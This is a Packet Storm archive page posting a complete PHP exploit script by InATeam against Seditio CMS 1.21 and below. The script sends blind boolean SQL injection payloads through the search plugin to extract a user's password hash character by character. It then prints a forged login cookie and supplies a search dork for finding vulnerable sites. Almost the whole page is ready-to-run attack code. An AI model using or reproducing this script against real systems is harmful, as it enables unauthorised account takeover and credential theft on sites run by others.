exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

seditio-sql.txt

seditio-sql.txt
Posted Nov 30, 2007
Authored by InATeam | Site inattack.ru

Seditio CMS versions 1.21 and below remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | f53e7a30e46b0e8e26ae4f106fb3d029aef94db96279f4e6c65fcfad39c246c7

seditio-sql.txt

Change Mirror Download
<?php
## Seditio CMS <= 121 Remote SQL Injection Exploit
## Software site: http://www.neocrome.net/
## By InATeam (http://inattack.ru/)
## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off

echo "------------------------------------------------------------\n";
echo "Seditio CMS <= 121 Remote SQL Injection Exploit\n";
echo "(c)oded by Raz0r, InATeam (http://inattack.ru/)\n";
echo "dork: \"Powered by Seditio\"\n";
echo "------------------------------------------------------------\n";

if ($argc<2) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$argv[0]} [url] OPTIONS\n\n";
echo "[url] - target server where Seditio CMS is installed\n\n";
echo "OPTIONS:\n";
echo "-p=<prefix> - use specific prefix (default sed_)\n";
echo "-id=<id> - use specific user id (default 1)\n\n";
echo "examples:\n";
echo "php {$argv[0]} http://site.com/ -p=cms_\n";
echo "php {$argv[0]} http://cms.site.com:8080/ -id=2\n";
die;
}

error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$url = $argv[1];
for($i=2;$i<$argc;$i++) {
if(strpos($argv[$i],"=")!==false) {
$exploded=explode("=",$argv[$i]);
if ($exploded[0]=='-p') $prefix = $exploded[1];
if ($exploded[0]=='-id') $id = $exploded[1];
}
}
if (!isset($prefix)) $prefix = "sed_";
if (!isset($id)) $id = 1;
$url_parts = parse_url($url);
$host = $url_parts['host'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
$path = $url_parts['path'];
print("[~] Connecting... ");
if (!getchar("<1",$i,false)) print("OK\n");
else die("\n[-] Exploit failed\n");
print(" Getting hash...");
$hash='';
for ($i=1; $i<=32; $i++) {
if (!getchar(">57",$i)) {
$min = 48;
$max = 57; }
else {
$min = 97;
$max = 102; }
for($j=$min;$j<=$max;$j++) {
if (getchar("+LIKE+$j",$i)) {
$hash .= chr($j);
break;
}
}
}
print("[+] Done! hash - $hash\n");
print("[+] Cookie to log in: \nSEDITIO=".base64_encode($id.":_:".$hash.":_:ice")."\n");

function getchar($query,$pos,$status=true){
global $host,$path,$prefix,$id;
if ($status) status();
$data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1";
$data.= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')";
$data.= "+AND+1=IF(ORD(MID((SELECT+user_password+FROM+{$prefix}users+WHERE";
$data.= "+user_id={$id}),{$pos},1)){$query},1,(SELECT+1+UNION+SELECT+5))/*&x=GUEST";
$packet = "POST {$path}plug.php?e=search&a=search HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: http://{$host}{$path}plug.php?e=search&a=search\r\n";
$packet .= "User-Agent: InAttack User Agent\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
return (strpos(send($packet),'Subquery returns more than 1 row')===false) ? true : false;
}

function send($packet) {
global $host,$port;
$ock = fsockopen(gethostbyname($host),$port);
if ($ock) {
fputs($ock, $packet);
$html='';
while (!feof($ock)) $html.=fgets($ock);
}
else die("[-] Exploit failed\n");
return $html;
}

function status() {
static $n;
$n++;
if ($n > 3) $n = 0;
if($n==0){ print "\r[-]\r"; }
if($n==1){ print "\r[\\]\r";}
if($n==2){ print "\r[|]\r"; }
if($n==3){ print "\r[/]\r"; }
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close